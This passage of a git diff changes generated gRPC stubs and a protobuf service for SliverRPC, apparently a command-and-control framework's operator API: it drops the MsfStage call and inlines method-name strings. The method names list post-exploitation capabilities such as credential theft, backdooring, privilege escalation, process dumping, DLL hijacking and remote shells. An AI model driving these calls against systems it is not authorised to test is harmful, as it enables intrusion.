index 682cd70170..66ffde0058 100644
--- a/protobuf/rpcpb/services.proto
+++ b/protobuf/rpcpb/services.proto
@@ -136,7 +136,6 @@ service SliverRPC {
rpc DeleteImplantProfile(clientpb.DeleteReq) returns (commonpb.Empty);
rpc SaveImplantProfile(clientpb.ImplantProfile)
returns (clientpb.ImplantProfile);
- rpc MsfStage(clientpb.MsfStagerReq) returns (clientpb.MsfStager);
rpc ShellcodeRDI(clientpb.ShellcodeRDIReq) returns (clientpb.ShellcodeRDI);
rpc GetCompiler(commonpb.Empty) returns (clientpb.Compiler);
rpc ShellcodeEncoder(clientpb.ShellcodeEncodeReq)
diff --git a/protobuf/rpcpb/services_grpc.pb.go b/protobuf/rpcpb/services_grpc.pb.go
index 40a3757cb3..1b805530f6 100644
--- a/protobuf/rpcpb/services_grpc.pb.go
+++ b/protobuf/rpcpb/services_grpc.pb.go
@@ -1,7 +1,7 @@
// Code generated by protoc-gen-go-grpc. DO NOT EDIT.
// versions:
-// - protoc-gen-go-grpc v1.3.0
-// - protoc v5.26.1
+// - protoc-gen-go-grpc v1.2.0
+// - protoc v4.25.3
// source: rpcpb/services.proto
package rpcpb
@@ -21,191 +21,6 @@ import (
// Requires gRPC-Go v1.32.0 or later.
const _ = grpc.SupportPackageIsVersion7
-const (
- SliverRPC_GetVersion_FullMethodName = "/rpcpb.SliverRPC/GetVersion"
- SliverRPC_ClientLog_FullMethodName = "/rpcpb.SliverRPC/ClientLog"
- SliverRPC_GetOperators_FullMethodName = "/rpcpb.SliverRPC/GetOperators"
- SliverRPC_Kill_FullMethodName = "/rpcpb.SliverRPC/Kill"
- SliverRPC_Reconfigure_FullMethodName = "/rpcpb.SliverRPC/Reconfigure"
- SliverRPC_Rename_FullMethodName = "/rpcpb.SliverRPC/Rename"
- SliverRPC_GetSessions_FullMethodName = "/rpcpb.SliverRPC/GetSessions"
- SliverRPC_MonitorStart_FullMethodName = "/rpcpb.SliverRPC/MonitorStart"
- SliverRPC_MonitorStop_FullMethodName = "/rpcpb.SliverRPC/MonitorStop"
- SliverRPC_MonitorListConfig_FullMethodName = "/rpcpb.SliverRPC/MonitorListConfig"
- SliverRPC_MonitorAddConfig_FullMethodName = "/rpcpb.SliverRPC/MonitorAddConfig"
- SliverRPC_MonitorDelConfig_FullMethodName = "/rpcpb.SliverRPC/MonitorDelConfig"
- SliverRPC_StartMTLSListener_FullMethodName = "/rpcpb.SliverRPC/StartMTLSListener"
- SliverRPC_StartWGListener_FullMethodName = "/rpcpb.SliverRPC/StartWGListener"
- SliverRPC_StartDNSListener_FullMethodName = "/rpcpb.SliverRPC/StartDNSListener"
- SliverRPC_StartHTTPSListener_FullMethodName = "/rpcpb.SliverRPC/StartHTTPSListener"
- SliverRPC_StartHTTPListener_FullMethodName = "/rpcpb.SliverRPC/StartHTTPListener"
- SliverRPC_GetBeacons_FullMethodName = "/rpcpb.SliverRPC/GetBeacons"
- SliverRPC_GetBeacon_FullMethodName = "/rpcpb.SliverRPC/GetBeacon"
- SliverRPC_RmBeacon_FullMethodName = "/rpcpb.SliverRPC/RmBeacon"
- SliverRPC_GetBeaconTasks_FullMethodName = "/rpcpb.SliverRPC/GetBeaconTasks"
- SliverRPC_GetBeaconTaskContent_FullMethodName = "/rpcpb.SliverRPC/GetBeaconTaskContent"
- SliverRPC_CancelBeaconTask_FullMethodName = "/rpcpb.SliverRPC/CancelBeaconTask"
- SliverRPC_UpdateBeaconIntegrityInformation_FullMethodName = "/rpcpb.SliverRPC/UpdateBeaconIntegrityInformation"
- SliverRPC_GetJobs_FullMethodName = "/rpcpb.SliverRPC/GetJobs"
- SliverRPC_KillJob_FullMethodName = "/rpcpb.SliverRPC/KillJob"
- SliverRPC_RestartJobs_FullMethodName = "/rpcpb.SliverRPC/RestartJobs"
- SliverRPC_StartTCPStagerListener_FullMethodName = "/rpcpb.SliverRPC/StartTCPStagerListener"
- SliverRPC_LootAdd_FullMethodName = "/rpcpb.SliverRPC/LootAdd"
- SliverRPC_LootRm_FullMethodName = "/rpcpb.SliverRPC/LootRm"
- SliverRPC_LootUpdate_FullMethodName = "/rpcpb.SliverRPC/LootUpdate"
- SliverRPC_LootContent_FullMethodName = "/rpcpb.SliverRPC/LootContent"
- SliverRPC_LootAll_FullMethodName = "/rpcpb.SliverRPC/LootAll"
- SliverRPC_Creds_FullMethodName = "/rpcpb.SliverRPC/Creds"
- SliverRPC_CredsAdd_FullMethodName = "/rpcpb.SliverRPC/CredsAdd"
- SliverRPC_CredsRm_FullMethodName = "/rpcpb.SliverRPC/CredsRm"
- SliverRPC_CredsUpdate_FullMethodName = "/rpcpb.SliverRPC/CredsUpdate"
- SliverRPC_GetCredByID_FullMethodName = "/rpcpb.SliverRPC/GetCredByID"
- SliverRPC_GetCredsByHashType_FullMethodName = "/rpcpb.SliverRPC/GetCredsByHashType"
- SliverRPC_GetPlaintextCredsByHashType_FullMethodName = "/rpcpb.SliverRPC/GetPlaintextCredsByHashType"
- SliverRPC_CredsSniffHashType_FullMethodName = "/rpcpb.SliverRPC/CredsSniffHashType"
- SliverRPC_Hosts_FullMethodName = "/rpcpb.SliverRPC/Hosts"
- SliverRPC_Host_FullMethodName = "/rpcpb.SliverRPC/Host"
- SliverRPC_HostRm_FullMethodName = "/rpcpb.SliverRPC/HostRm"
- SliverRPC_HostIOCRm_FullMethodName = "/rpcpb.SliverRPC/HostIOCRm"
- SliverRPC_Generate_FullMethodName = "/rpcpb.SliverRPC/Generate"
- SliverRPC_GenerateExternal_FullMethodName = "/rpcpb.SliverRPC/GenerateExternal"
- SliverRPC_GenerateExternalSaveBuild_FullMethodName = "/rpcpb.SliverRPC/GenerateExternalSaveBuild"
- SliverRPC_GenerateExternalGetBuildConfig_FullMethodName = "/rpcpb.SliverRPC/GenerateExternalGetBuildConfig"
- SliverRPC_GenerateStage_FullMethodName = "/rpcpb.SliverRPC/GenerateStage"
- SliverRPC_StageImplantBuild_FullMethodName = "/rpcpb.SliverRPC/StageImplantBuild"
- SliverRPC_GetHTTPC2Profiles_FullMethodName = "/rpcpb.SliverRPC/GetHTTPC2Profiles"
- SliverRPC_GetHTTPC2ProfileByName_FullMethodName = "/rpcpb.SliverRPC/GetHTTPC2ProfileByName"
- SliverRPC_SaveHTTPC2Profile_FullMethodName = "/rpcpb.SliverRPC/SaveHTTPC2Profile"
- SliverRPC_BuilderRegister_FullMethodName = "/rpcpb.SliverRPC/BuilderRegister"
- SliverRPC_BuilderTrigger_FullMethodName = "/rpcpb.SliverRPC/BuilderTrigger"
- SliverRPC_Builders_FullMethodName = "/rpcpb.SliverRPC/Builders"
- SliverRPC_GetCertificateInfo_FullMethodName = "/rpcpb.SliverRPC/GetCertificateInfo"
- SliverRPC_CrackstationRegister_FullMethodName = "/rpcpb.SliverRPC/CrackstationRegister"
- SliverRPC_CrackstationTrigger_FullMethodName = "/rpcpb.SliverRPC/CrackstationTrigger"
- SliverRPC_CrackstationBenchmark_FullMethodName = "/rpcpb.SliverRPC/CrackstationBenchmark"
- SliverRPC_Crackstations_FullMethodName = "/rpcpb.SliverRPC/Crackstations"
- SliverRPC_CrackTaskByID_FullMethodName = "/rpcpb.SliverRPC/CrackTaskByID"
- SliverRPC_CrackTaskUpdate_FullMethodName = "/rpcpb.SliverRPC/CrackTaskUpdate"
- SliverRPC_CrackFilesList_FullMethodName = "/rpcpb.SliverRPC/CrackFilesList"
- SliverRPC_CrackFileCreate_FullMethodName = "/rpcpb.SliverRPC/CrackFileCreate"
- SliverRPC_CrackFileChunkUpload_FullMethodName = "/rpcpb.SliverRPC/CrackFileChunkUpload"
- SliverRPC_CrackFileChunkDownload_FullMethodName = "/rpcpb.SliverRPC/CrackFileChunkDownload"
- SliverRPC_CrackFileComplete_FullMethodName = "/rpcpb.SliverRPC/CrackFileComplete"
- SliverRPC_CrackFileDelete_FullMethodName = "/rpcpb.SliverRPC/CrackFileDelete"
- SliverRPC_Regenerate_FullMethodName = "/rpcpb.SliverRPC/Regenerate"
- SliverRPC_ImplantBuilds_FullMethodName = "/rpcpb.SliverRPC/ImplantBuilds"
- SliverRPC_DeleteImplantBuild_FullMethodName = "/rpcpb.SliverRPC/DeleteImplantBuild"
- SliverRPC_Canaries_FullMethodName = "/rpcpb.SliverRPC/Canaries"
- SliverRPC_GenerateWGClientConfig_FullMethodName = "/rpcpb.SliverRPC/GenerateWGClientConfig"
- SliverRPC_GenerateUniqueIP_FullMethodName = "/rpcpb.SliverRPC/GenerateUniqueIP"
- SliverRPC_ImplantProfiles_FullMethodName = "/rpcpb.SliverRPC/ImplantProfiles"
- SliverRPC_DeleteImplantProfile_FullMethodName = "/rpcpb.SliverRPC/DeleteImplantProfile"
- SliverRPC_SaveImplantProfile_FullMethodName = "/rpcpb.SliverRPC/SaveImplantProfile"
- SliverRPC_MsfStage_FullMethodName = "/rpcpb.SliverRPC/MsfStage"
- SliverRPC_ShellcodeRDI_FullMethodName = "/rpcpb.SliverRPC/ShellcodeRDI"
- SliverRPC_GetCompiler_FullMethodName = "/rpcpb.SliverRPC/GetCompiler"
- SliverRPC_ShellcodeEncoder_FullMethodName = "/rpcpb.SliverRPC/ShellcodeEncoder"
- SliverRPC_ShellcodeEncoderMap_FullMethodName = "/rpcpb.SliverRPC/ShellcodeEncoderMap"
- SliverRPC_TrafficEncoderMap_FullMethodName = "/rpcpb.SliverRPC/TrafficEncoderMap"
- SliverRPC_TrafficEncoderAdd_FullMethodName = "/rpcpb.SliverRPC/TrafficEncoderAdd"
- SliverRPC_TrafficEncoderRm_FullMethodName = "/rpcpb.SliverRPC/TrafficEncoderRm"
- SliverRPC_Websites_FullMethodName = "/rpcpb.SliverRPC/Websites"
- SliverRPC_Website_FullMethodName = "/rpcpb.SliverRPC/Website"
- SliverRPC_WebsiteRemove_FullMethodName = "/rpcpb.SliverRPC/WebsiteRemove"
- SliverRPC_WebsiteAddContent_FullMethodName = "/rpcpb.SliverRPC/WebsiteAddContent"
- SliverRPC_WebsiteUpdateContent_FullMethodName = "/rpcpb.SliverRPC/WebsiteUpdateContent"
- SliverRPC_WebsiteRemoveContent_FullMethodName = "/rpcpb.SliverRPC/WebsiteRemoveContent"
- SliverRPC_Ping_FullMethodName = "/rpcpb.SliverRPC/Ping"
- SliverRPC_Ps_FullMethodName = "/rpcpb.SliverRPC/Ps"
- SliverRPC_Terminate_FullMethodName = "/rpcpb.SliverRPC/Terminate"
- SliverRPC_Ifconfig_FullMethodName = "/rpcpb.SliverRPC/Ifconfig"
- SliverRPC_Netstat_FullMethodName = "/rpcpb.SliverRPC/Netstat"
- SliverRPC_Ls_FullMethodName = "/rpcpb.SliverRPC/Ls"
- SliverRPC_Cd_FullMethodName = "/rpcpb.SliverRPC/Cd"
- SliverRPC_Pwd_FullMethodName = "/rpcpb.SliverRPC/Pwd"
- SliverRPC_Mv_FullMethodName = "/rpcpb.SliverRPC/Mv"
- SliverRPC_Cp_FullMethodName = "/rpcpb.SliverRPC/Cp"
- SliverRPC_Rm_FullMethodName = "/rpcpb.SliverRPC/Rm"
- SliverRPC_Mkdir_FullMethodName = "/rpcpb.SliverRPC/Mkdir"
- SliverRPC_Download_FullMethodName = "/rpcpb.SliverRPC/Download"
- SliverRPC_Upload_FullMethodName = "/rpcpb.SliverRPC/Upload"
- SliverRPC_Grep_FullMethodName = "/rpcpb.SliverRPC/Grep"
- SliverRPC_Chmod_FullMethodName = "/rpcpb.SliverRPC/Chmod"
- SliverRPC_Chown_FullMethodName = "/rpcpb.SliverRPC/Chown"
- SliverRPC_Chtimes_FullMethodName = "/rpcpb.SliverRPC/Chtimes"
- SliverRPC_MemfilesList_FullMethodName = "/rpcpb.SliverRPC/MemfilesList"
- SliverRPC_MemfilesAdd_FullMethodName = "/rpcpb.SliverRPC/MemfilesAdd"
- SliverRPC_MemfilesRm_FullMethodName = "/rpcpb.SliverRPC/MemfilesRm"
- SliverRPC_Mount_FullMethodName = "/rpcpb.SliverRPC/Mount"
- SliverRPC_ProcessDump_FullMethodName = "/rpcpb.SliverRPC/ProcessDump"
- SliverRPC_RunAs_FullMethodName = "/rpcpb.SliverRPC/RunAs"
- SliverRPC_Impersonate_FullMethodName = "/rpcpb.SliverRPC/Impersonate"
- SliverRPC_RevToSelf_FullMethodName = "/rpcpb.SliverRPC/RevToSelf"
- SliverRPC_GetSystem_FullMethodName = "/rpcpb.SliverRPC/GetSystem"
- SliverRPC_Task_FullMethodName = "/rpcpb.SliverRPC/Task"
- SliverRPC_Msf_FullMethodName = "/rpcpb.SliverRPC/Msf"
- SliverRPC_MsfRemote_FullMethodName = "/rpcpb.SliverRPC/MsfRemote"
- SliverRPC_ExecuteAssembly_FullMethodName = "/rpcpb.SliverRPC/ExecuteAssembly"
- SliverRPC_Migrate_FullMethodName = "/rpcpb.SliverRPC/Migrate"
- SliverRPC_Execute_FullMethodName = "/rpcpb.SliverRPC/Execute"
- SliverRPC_ExecuteWindows_FullMethodName = "/rpcpb.SliverRPC/ExecuteWindows"
- SliverRPC_Sideload_FullMethodName = "/rpcpb.SliverRPC/Sideload"
- SliverRPC_SpawnDll_FullMethodName = "/rpcpb.SliverRPC/SpawnDll"
- SliverRPC_Screenshot_FullMethodName = "/rpcpb.SliverRPC/Screenshot"
- SliverRPC_CurrentTokenOwner_FullMethodName = "/rpcpb.SliverRPC/CurrentTokenOwner"
- SliverRPC_Services_FullMethodName = "/rpcpb.SliverRPC/Services"
- SliverRPC_ServiceDetail_FullMethodName = "/rpcpb.SliverRPC/ServiceDetail"
- SliverRPC_StartServiceByName_FullMethodName = "/rpcpb.SliverRPC/StartServiceByName"
- SliverRPC_PivotStartListener_FullMethodName = "/rpcpb.SliverRPC/PivotStartListener"
- SliverRPC_PivotStopListener_FullMethodName = "/rpcpb.SliverRPC/PivotStopListener"
- SliverRPC_PivotSessionListeners_FullMethodName = "/rpcpb.SliverRPC/PivotSessionListeners"
- SliverRPC_PivotGraph_FullMethodName = "/rpcpb.SliverRPC/PivotGraph"
- SliverRPC_StartService_FullMethodName = "/rpcpb.SliverRPC/StartService"
- SliverRPC_StopService_FullMethodName = "/rpcpb.SliverRPC/StopService"
- SliverRPC_RemoveService_FullMethodName = "/rpcpb.SliverRPC/RemoveService"
- SliverRPC_MakeToken_FullMethodName = "/rpcpb.SliverRPC/MakeToken"
- SliverRPC_GetEnv_FullMethodName = "/rpcpb.SliverRPC/GetEnv"
- SliverRPC_SetEnv_FullMethodName = "/rpcpb.SliverRPC/SetEnv"
- SliverRPC_UnsetEnv_FullMethodName = "/rpcpb.SliverRPC/UnsetEnv"
- SliverRPC_Backdoor_FullMethodName = "/rpcpb.SliverRPC/Backdoor"
- SliverRPC_RegistryRead_FullMethodName = "/rpcpb.SliverRPC/RegistryRead"
- SliverRPC_RegistryWrite_FullMethodName = "/rpcpb.SliverRPC/RegistryWrite"
- SliverRPC_RegistryCreateKey_FullMethodName = "/rpcpb.SliverRPC/RegistryCreateKey"
- SliverRPC_RegistryDeleteKey_FullMethodName = "/rpcpb.SliverRPC/RegistryDeleteKey"
- SliverRPC_RegistryListSubKeys_FullMethodName = "/rpcpb.SliverRPC/RegistryListSubKeys"
- SliverRPC_RegistryListValues_FullMethodName = "/rpcpb.SliverRPC/RegistryListValues"
- SliverRPC_RegistryReadHive_FullMethodName = "/rpcpb.SliverRPC/RegistryReadHive"
- SliverRPC_RunSSHCommand_FullMethodName = "/rpcpb.SliverRPC/RunSSHCommand"
- SliverRPC_HijackDLL_FullMethodName = "/rpcpb.SliverRPC/HijackDLL"
- SliverRPC_GetPrivs_FullMethodName = "/rpcpb.SliverRPC/GetPrivs"
- SliverRPC_StartRportFwdListener_FullMethodName = "/rpcpb.SliverRPC/StartRportFwdListener"
- SliverRPC_GetRportFwdListeners_FullMethodName = "/rpcpb.SliverRPC/GetRportFwdListeners"
- SliverRPC_StopRportFwdListener_FullMethodName = "/rpcpb.SliverRPC/StopRportFwdListener"
- SliverRPC_OpenSession_FullMethodName = "/rpcpb.SliverRPC/OpenSession"
- SliverRPC_CloseSession_FullMethodName = "/rpcpb.SliverRPC/CloseSession"
- SliverRPC_RegisterExtension_FullMethodName = "/rpcpb.SliverRPC/RegisterExtension"
- SliverRPC_CallExtension_FullMethodName = "/rpcpb.SliverRPC/CallExtension"
- SliverRPC_ListExtensions_FullMethodName = "/rpcpb.SliverRPC/ListExtensions"
- SliverRPC_RegisterWasmExtension_FullMethodName = "/rpcpb.SliverRPC/RegisterWasmExtension"
- SliverRPC_ListWasmExtensions_FullMethodName = "/rpcpb.SliverRPC/ListWasmExtensions"
- SliverRPC_ExecWasmExtension_FullMethodName = "/rpcpb.SliverRPC/ExecWasmExtension"
- SliverRPC_WGStartPortForward_FullMethodName = "/rpcpb.SliverRPC/WGStartPortForward"
- SliverRPC_WGStopPortForward_FullMethodName = "/rpcpb.SliverRPC/WGStopPortForward"
- SliverRPC_WGStartSocks_FullMethodName = "/rpcpb.SliverRPC/WGStartSocks"
- SliverRPC_WGStopSocks_FullMethodName = "/rpcpb.SliverRPC/WGStopSocks"
- SliverRPC_WGListForwarders_FullMethodName = "/rpcpb.SliverRPC/WGListForwarders"
- SliverRPC_WGListSocksServers_FullMethodName = "/rpcpb.SliverRPC/WGListSocksServers"
- SliverRPC_Shell_FullMethodName = "/rpcpb.SliverRPC/Shell"
- SliverRPC_Portfwd_FullMethodName = "/rpcpb.SliverRPC/Portfwd"
- SliverRPC_CreateSocks_FullMethodName = "/rpcpb.SliverRPC/CreateSocks"
- SliverRPC_CloseSocks_FullMethodName = "/rpcpb.SliverRPC/CloseSocks"
- SliverRPC_SocksProxy_FullMethodName = "/rpcpb.SliverRPC/SocksProxy"
- SliverRPC_CreateTunnel_FullMethodName = "/rpcpb.SliverRPC/CreateTunnel"
- SliverRPC_CloseTunnel_FullMethodName = "/rpcpb.SliverRPC/CloseTunnel"
- SliverRPC_TunnelData_FullMethodName = "/rpcpb.SliverRPC/TunnelData"
- SliverRPC_Events_FullMethodName = "/rpcpb.SliverRPC/Events"
-)
-
// SliverRPCClient is the client API for SliverRPC service.
//
// For semantics around ctx use and closing/ending streaming RPCs, please refer to https://pkg.go.dev/google.golang.org/grpc/?tab=doc#ClientConn.NewStream.
@@ -308,7 +123,6 @@ type SliverRPCClient interface {
ImplantProfiles(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.ImplantProfiles, error)
DeleteImplantProfile(ctx context.Context, in *clientpb.DeleteReq, opts ...grpc.CallOption) (*commonpb.Empty, error)
SaveImplantProfile(ctx context.Context, in *clientpb.ImplantProfile, opts ...grpc.CallOption) (*clientpb.ImplantProfile, error)
- MsfStage(ctx context.Context, in *clientpb.MsfStagerReq, opts ...grpc.CallOption) (*clientpb.MsfStager, error)
ShellcodeRDI(ctx context.Context, in *clientpb.ShellcodeRDIReq, opts ...grpc.CallOption) (*clientpb.ShellcodeRDI, error)
GetCompiler(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Compiler, error)
ShellcodeEncoder(ctx context.Context, in *clientpb.ShellcodeEncodeReq, opts ...grpc.CallOption) (*clientpb.ShellcodeEncode, error)
@@ -434,7 +248,7 @@ func NewSliverRPCClient(cc grpc.ClientConnInterface) SliverRPCClient {
func (c *sliverRPCClient) GetVersion(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Version, error) {
out := new(clientpb.Version)
- err := c.cc.Invoke(ctx, SliverRPC_GetVersion_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetVersion", in, out, opts...)
if err != nil {
return nil, err
}
@@ -442,7 +256,7 @@ func (c *sliverRPCClient) GetVersion(ctx context.Context, in *commonpb.Empty, op
}
func (c *sliverRPCClient) ClientLog(ctx context.Context, opts ...grpc.CallOption) (SliverRPC_ClientLogClient, error) {
- stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[0], SliverRPC_ClientLog_FullMethodName, opts...)
+ stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[0], "/rpcpb.SliverRPC/ClientLog", opts...)
if err != nil {
return nil, err
}
@@ -477,7 +291,7 @@ func (x *sliverRPCClientLogClient) CloseAndRecv() (*commonpb.Empty, error) {
func (c *sliverRPCClient) GetOperators(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Operators, error) {
out := new(clientpb.Operators)
- err := c.cc.Invoke(ctx, SliverRPC_GetOperators_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetOperators", in, out, opts...)
if err != nil {
return nil, err
}
@@ -486,7 +300,7 @@ func (c *sliverRPCClient) GetOperators(ctx context.Context, in *commonpb.Empty,
func (c *sliverRPCClient) Kill(ctx context.Context, in *sliverpb.KillReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_Kill_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Kill", in, out, opts...)
if err != nil {
return nil, err
}
@@ -495,7 +309,7 @@ func (c *sliverRPCClient) Kill(ctx context.Context, in *sliverpb.KillReq, opts .
func (c *sliverRPCClient) Reconfigure(ctx context.Context, in *sliverpb.ReconfigureReq, opts ...grpc.CallOption) (*sliverpb.Reconfigure, error) {
out := new(sliverpb.Reconfigure)
- err := c.cc.Invoke(ctx, SliverRPC_Reconfigure_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Reconfigure", in, out, opts...)
if err != nil {
return nil, err
}
@@ -504,7 +318,7 @@ func (c *sliverRPCClient) Reconfigure(ctx context.Context, in *sliverpb.Reconfig
func (c *sliverRPCClient) Rename(ctx context.Context, in *clientpb.RenameReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_Rename_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Rename", in, out, opts...)
if err != nil {
return nil, err
}
@@ -513,7 +327,7 @@ func (c *sliverRPCClient) Rename(ctx context.Context, in *clientpb.RenameReq, op
func (c *sliverRPCClient) GetSessions(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Sessions, error) {
out := new(clientpb.Sessions)
- err := c.cc.Invoke(ctx, SliverRPC_GetSessions_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetSessions", in, out, opts...)
if err != nil {
return nil, err
}
@@ -522,7 +336,7 @@ func (c *sliverRPCClient) GetSessions(ctx context.Context, in *commonpb.Empty, o
func (c *sliverRPCClient) MonitorStart(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*commonpb.Response, error) {
out := new(commonpb.Response)
- err := c.cc.Invoke(ctx, SliverRPC_MonitorStart_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MonitorStart", in, out, opts...)
if err != nil {
return nil, err
}
@@ -531,7 +345,7 @@ func (c *sliverRPCClient) MonitorStart(ctx context.Context, in *commonpb.Empty,
func (c *sliverRPCClient) MonitorStop(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_MonitorStop_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MonitorStop", in, out, opts...)
if err != nil {
return nil, err
}
@@ -540,7 +354,7 @@ func (c *sliverRPCClient) MonitorStop(ctx context.Context, in *commonpb.Empty, o
func (c *sliverRPCClient) MonitorListConfig(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.MonitoringProviders, error) {
out := new(clientpb.MonitoringProviders)
- err := c.cc.Invoke(ctx, SliverRPC_MonitorListConfig_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MonitorListConfig", in, out, opts...)
if err != nil {
return nil, err
}
@@ -549,7 +363,7 @@ func (c *sliverRPCClient) MonitorListConfig(ctx context.Context, in *commonpb.Em
func (c *sliverRPCClient) MonitorAddConfig(ctx context.Context, in *clientpb.MonitoringProvider, opts ...grpc.CallOption) (*commonpb.Response, error) {
out := new(commonpb.Response)
- err := c.cc.Invoke(ctx, SliverRPC_MonitorAddConfig_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MonitorAddConfig", in, out, opts...)
if err != nil {
return nil, err
}
@@ -558,7 +372,7 @@ func (c *sliverRPCClient) MonitorAddConfig(ctx context.Context, in *clientpb.Mon
func (c *sliverRPCClient) MonitorDelConfig(ctx context.Context, in *clientpb.MonitoringProvider, opts ...grpc.CallOption) (*commonpb.Response, error) {
out := new(commonpb.Response)
- err := c.cc.Invoke(ctx, SliverRPC_MonitorDelConfig_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MonitorDelConfig", in, out, opts...)
if err != nil {
return nil, err
}
@@ -567,7 +381,7 @@ func (c *sliverRPCClient) MonitorDelConfig(ctx context.Context, in *clientpb.Mon
func (c *sliverRPCClient) StartMTLSListener(ctx context.Context, in *clientpb.MTLSListenerReq, opts ...grpc.CallOption) (*clientpb.ListenerJob, error) {
out := new(clientpb.ListenerJob)
- err := c.cc.Invoke(ctx, SliverRPC_StartMTLSListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartMTLSListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -576,7 +390,7 @@ func (c *sliverRPCClient) StartMTLSListener(ctx context.Context, in *clientpb.MT
func (c *sliverRPCClient) StartWGListener(ctx context.Context, in *clientpb.WGListenerReq, opts ...grpc.CallOption) (*clientpb.ListenerJob, error) {
out := new(clientpb.ListenerJob)
- err := c.cc.Invoke(ctx, SliverRPC_StartWGListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartWGListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -585,7 +399,7 @@ func (c *sliverRPCClient) StartWGListener(ctx context.Context, in *clientpb.WGLi
func (c *sliverRPCClient) StartDNSListener(ctx context.Context, in *clientpb.DNSListenerReq, opts ...grpc.CallOption) (*clientpb.ListenerJob, error) {
out := new(clientpb.ListenerJob)
- err := c.cc.Invoke(ctx, SliverRPC_StartDNSListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartDNSListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -594,7 +408,7 @@ func (c *sliverRPCClient) StartDNSListener(ctx context.Context, in *clientpb.DNS
func (c *sliverRPCClient) StartHTTPSListener(ctx context.Context, in *clientpb.HTTPListenerReq, opts ...grpc.CallOption) (*clientpb.ListenerJob, error) {
out := new(clientpb.ListenerJob)
- err := c.cc.Invoke(ctx, SliverRPC_StartHTTPSListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartHTTPSListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -603,7 +417,7 @@ func (c *sliverRPCClient) StartHTTPSListener(ctx context.Context, in *clientpb.H
func (c *sliverRPCClient) StartHTTPListener(ctx context.Context, in *clientpb.HTTPListenerReq, opts ...grpc.CallOption) (*clientpb.ListenerJob, error) {
out := new(clientpb.ListenerJob)
- err := c.cc.Invoke(ctx, SliverRPC_StartHTTPListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartHTTPListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -612,7 +426,7 @@ func (c *sliverRPCClient) StartHTTPListener(ctx context.Context, in *clientpb.HT
func (c *sliverRPCClient) GetBeacons(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Beacons, error) {
out := new(clientpb.Beacons)
- err := c.cc.Invoke(ctx, SliverRPC_GetBeacons_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetBeacons", in, out, opts...)
if err != nil {
return nil, err
}
@@ -621,7 +435,7 @@ func (c *sliverRPCClient) GetBeacons(ctx context.Context, in *commonpb.Empty, op
func (c *sliverRPCClient) GetBeacon(ctx context.Context, in *clientpb.Beacon, opts ...grpc.CallOption) (*clientpb.Beacon, error) {
out := new(clientpb.Beacon)
- err := c.cc.Invoke(ctx, SliverRPC_GetBeacon_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetBeacon", in, out, opts...)
if err != nil {
return nil, err
}
@@ -630,7 +444,7 @@ func (c *sliverRPCClient) GetBeacon(ctx context.Context, in *clientpb.Beacon, op
func (c *sliverRPCClient) RmBeacon(ctx context.Context, in *clientpb.Beacon, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_RmBeacon_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RmBeacon", in, out, opts...)
if err != nil {
return nil, err
}
@@ -639,7 +453,7 @@ func (c *sliverRPCClient) RmBeacon(ctx context.Context, in *clientpb.Beacon, opt
func (c *sliverRPCClient) GetBeaconTasks(ctx context.Context, in *clientpb.Beacon, opts ...grpc.CallOption) (*clientpb.BeaconTasks, error) {
out := new(clientpb.BeaconTasks)
- err := c.cc.Invoke(ctx, SliverRPC_GetBeaconTasks_FullMethodName, in, out, opts...)
